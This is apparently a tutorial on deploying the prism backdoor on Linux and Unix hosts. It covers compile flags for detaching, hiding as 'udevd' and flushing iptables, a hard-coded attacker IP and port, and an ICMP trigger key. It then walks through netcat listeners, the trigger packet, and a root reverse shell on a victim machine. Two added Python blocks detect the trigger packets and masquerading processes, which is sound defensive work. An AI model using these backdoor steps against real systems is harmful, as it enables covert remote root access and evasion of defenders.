Supported platforms

Linux
Solaris
AIX
BSD/Mac
Android

Features

Supports two modes: ICMP and STATIC
Customizable process name
No listening port
Can flush the iptables configuration
Written in pure C
No library dependencies

Project URL

git clone https://github.com/andreafabrizi/prism.git

Compilation

gcc <..OPTIONS..> -Wall -s -o prism prism.c

The options are as follows:

-DDETACH    # run in the background
-DSTATIC    # enable STATIC mode (the default is ICMP mode)
-DNORENAME  # do not use the custom process name
-DIPTABLES  # flush all iptables rules

ICMP mode

In this mode the backdoor waits in the background for a specific ICMP packet that carries the host/port it should connect back to; a private key in the packet keeps third parties from triggering it. The backdoor process is activated by a ping packet.

The key can be changed; the default is p4ssw0rd.

vim prism.c

#ifdef STATIC
# define REVERSE_HOST     "172.16.100.182"
# define REVERSE_PORT     6666
# define RESPAWN_DELAY    15
#else
# define ICMP_PACKET_SIZE 1024
# define ICMP_KEY         "p4ssw0rd"
#endif

#define VERSION          "0.5"
#define MOTD             "PRISM v"VERSION" started\n\n# "
#define SHELL            "/bin/sh"
#define PROCESS_NAME     "udevd"

gcc -DDETACH -DNORENAME -Wall -s -o prism prism.c

[root@vincent prism-master]# ./prism Inf0

 Version:          0.5
 Mode:             icmp
 Key:              p4ssw0rd
 Shell:            /bin/sh
 Detach:           Yes
 Flush Iptables:   No

You can see that the mode is icmp.

Attacker machine (172.16.100.182):

nc -vv -l -p 6666

Victim machine (172.16.100.134):

./prism

Attacker machine (172.16.100.182):

./sendPacket.py 172.16.100.134 p4ssw0rd 172.16.100.182 6666

This sends the ICMP packet. Its contents are as follows:

p4ssw0rd 172.16.100.182 6666 QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ

A shell is then obtained.

root@kali:/tmp/prism# nc -l -p 6666
PRISM v0.5 started

# whoami
root
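The trigger packet shown above is an ordinary ICMP echo whose payload is the key, the connect-back host and the port, padded with filler bytes up to ICMP_PACKET_SIZE. A defender watching ICMP traffic does not know the key, but the payload layout itself is a usable signature. The following is an added example, not code from the page or from the prism project: it parses a raw IPv4/ICMP frame, strips the filler run and flags payloads laid out as `<token> <IPv4> <port>`, reporting the connect-back target. The `build_echo_request` helper and the sample frames it builds are constructed for the demonstration (checksums are left zero), and the 64-byte key limit in the regular expression is an assumption.

```python
import ipaddress
import re
import struct

# Layout of the trigger payload as shown on the page: "<key> <host> <port>" followed by
# filler bytes up to ICMP_PACKET_SIZE (1024). A defender does not know the key, so the
# matcher looks for the shape: a printable token, an IPv4 literal and a port number.
# The 64-byte key limit is an assumption.
TRIGGER_RE = re.compile(rb"^([!-~]{1,64}) (\d{1,3}(?:\.\d{1,3}){3}) (\d{1,5})$")
FILLER_MIN_RUN = 8   # a trailing run shorter than this is treated as real data, not padding


def icmp_echo_payload(frame: bytes):
    """Return the echo payload of a raw IPv4 frame, or None if it is not an ICMP echo."""
    if len(frame) < 20:
        return None
    ihl = (frame[0] & 0x0F) * 4                  # IPv4 header length in bytes
    if frame[9] != 1 or len(frame) < ihl + 8:    # protocol 1 = ICMP, 8-byte ICMP header
        return None
    if frame[ihl] not in (0, 8):                 # echo reply / echo request only
        return None
    return frame[ihl + 8:]


def strip_filler(payload: bytes) -> bytes:
    """Drop a trailing run of one repeated byte (the 'QQQQ...' filler in the sample packet)."""
    if not payload:
        return payload
    stripped = payload.rstrip(payload[-1:])
    return stripped if len(payload) - len(stripped) >= FILLER_MIN_RUN else payload


def classify_payload(payload: bytes) -> dict:
    """Score an echo payload for the 'key host port' trigger layout."""
    verdict = {"trigger_like": False, "target": None, "oversized": len(payload) >= 1024}
    m = TRIGGER_RE.match(strip_filler(payload).strip())
    if not m:
        return verdict
    host, port = m.group(2).decode(), int(m.group(3))
    try:
        ipaddress.IPv4Address(host)              # rejects octets above 255
    except ValueError:
        return verdict
    if 1 <= port <= 65535:
        verdict["trigger_like"] = True
        verdict["target"] = (host, port)
    return verdict


def find_triggers(frames) -> list:
    """Return (index, connect-back target) for every frame whose echo payload looks like a trigger."""
    hits = []
    for i, frame in enumerate(frames):
        payload = icmp_echo_payload(frame)
        if payload is None:
            continue
        verdict = classify_payload(payload)
        if verdict["trigger_like"]:
            hits.append((i, verdict["target"]))
    return hits


def build_echo_request(payload: bytes, src="10.0.0.5", dst="10.0.0.9") -> bytes:
    """Build a minimal IPv4 + ICMP echo request frame for testing (constructed; checksums left zero)."""
    total = 20 + 8 + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total, 0, 0, 64, 1, 0,
                     ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    icmp = struct.pack("!BBHHH", 8, 0, 0, 1, 1)   # type 8 (echo request), code 0, id 1, seq 1
    return ip + icmp + payload


if __name__ == "__main__":
    # Constructed samples: a normal 56-byte ping payload and a trigger padded to 1024 bytes.
    ping = build_echo_request(b"\x00" * 8 + bytes(range(0x10, 0x38)))
    trigger = build_echo_request(b"p4ssw0rd 172.16.100.182 6666 " + b"Q" * 995)
    print(find_triggers([ping, trigger]))   # [(1, ('172.16.100.182', 6666))]
```

In practice the frames would come from a pcap or a raw socket rather than from the helper. The structural match is the strong indicator; the `oversized` flag is a weaker one (an echo payload far larger than the default ping size) that is worth reporting alongside it, because a variant that changes the padding character or the token order would defeat the regular expression but not the size check.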

 

STATIC mode

The backdoor tries to connect to a hard-coded IP:PORT.

vim prism.c

#ifdef STATIC
# define REVERSE_HOST     "172.16.100.182"
# define REVERSE_PORT     6666
# define RESPAWN_DELAY    15
#else
# define ICMP_PACKET_SIZE 1024
# define ICMP_KEY         "p4ssw0rd"
#endif

#define VERSION          "0.5"
#define MOTD             "PRISM v"VERSION" started\n\n# "
#define SHELL            "/bin/sh"
#define PROCESS_NAME     "udevd"

You can see that the custom process name is udevd.

Recompile:

gcc -DDETACH -DSTATIC -Wall -s -o prism prism.c


[root@vincent prism-master]# ./prism Inf0

 Version:          0.5
 Mode:             static
 Host:             172.16.100.182
 Port:             6666
 Respawn Delay:    15 sec
 Process name:     udevd
 Shell:            /bin/sh
 Detach:           Yes
 Flush Iptables:   No

Attacker machine (172.16.100.182):

nc -vv -l -p 6666

Victim machine (172.16.100.134):

./prism

Check the process:

[root@vincent prism-master]# ps axu | grep udev | grep -v grep

root      14474  0.0  0.0   3924   144 pts/1    S    17:26   0:00 udevd
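The ps output above shows why a name match alone proves nothing: the process calls itself udevd, but that name is set by the binary and says nothing about where it was loaded from. On Linux the /proc/<pid>/exe link still points at the real executable, so a defender can compare the claimed name with the executable's file name and location. The following is an added example, not part of the page or the prism project: it evaluates constructed process records and, in `scan_proc`, applies the same check to the live /proc tree. The trusted directory list and the daemon watch list are assumptions to adjust per system.

```python
import os
from dataclasses import dataclass

# Directories where genuine system daemons are expected to live (assumption; adjust per distro).
TRUSTED_DIRS = ("/bin", "/sbin", "/usr/bin", "/usr/sbin", "/lib", "/usr/lib", "/usr/libexec")
# Daemon names that warrant a location check when a process claims them (constructed watch list).
DAEMON_NAMES = {"udevd", "systemd-udevd", "sshd", "crond", "rsyslogd", "dbus-daemon"}


@dataclass
class ProcInfo:
    pid: int
    claimed_name: str   # what ps shows: argv[0] from /proc/<pid>/cmdline, or comm
    exe: str            # target of the /proc/<pid>/exe symlink


def in_trusted_dir(path: str) -> bool:
    """True if the path sits below one of the trusted directories."""
    return any(path == d or path.startswith(d + "/") for d in TRUSTED_DIRS)


def suspicious(p: ProcInfo) -> list:
    """Return the reasons a process looks like it is masquerading; an empty list means clean."""
    reasons = []
    exe = p.exe
    if exe.endswith(" (deleted)"):          # binary unlinked after start, a common hiding trick
        reasons.append("executable was deleted from disk")
        exe = exe[: -len(" (deleted)")]
    claimed = os.path.basename(p.claimed_name).lstrip("-")   # login shells show as "-bash"
    actual = os.path.basename(exe)
    # The on-disk name may carry a version suffix (python3 -> python3.11), so prefix-match it.
    if not actual.startswith(claimed):
        reasons.append(f"claims to be {claimed!r} but runs {exe!r}")
    if claimed in DAEMON_NAMES and not in_trusted_dir(exe):
        reasons.append(f"system daemon name running from {os.path.dirname(exe) or '/'}")
    return reasons


def scan_proc() -> list:
    """Walk /proc on a live Linux host and return (ProcInfo, reasons) for every suspicious process."""
    found = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                argv0 = f.read().split(b"\0")[0].decode(errors="replace")
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()          # kernel truncates comm to 15 characters
            exe = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            continue    # kernel thread, process already gone, or no permission
        info = ProcInfo(int(pid), argv0 or comm, exe)
        reasons = suspicious(info)
        if reasons:
            found.append((info, reasons))
    return found


if __name__ == "__main__":
    for info, reasons in scan_proc():
        print(f"pid {info.pid} ({info.claimed_name}): " + "; ".join(reasons))
```

Run as root so that every /proc/<pid>/exe link is readable. The prefix match on the base name keeps versioned interpreters and login shells quiet, but wrapper scripts that re-exec a differently named binary will still show up; treat the output as a triage list, and pair it with the network side (a process with a daemon's name that keeps retrying one outbound IP:PORT every RESPAWN_DELAY seconds).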

Obtain the shell:

root@kali:/tmp/prism# nc -l -p 6666
PRISM v0.5 started

# whoami
root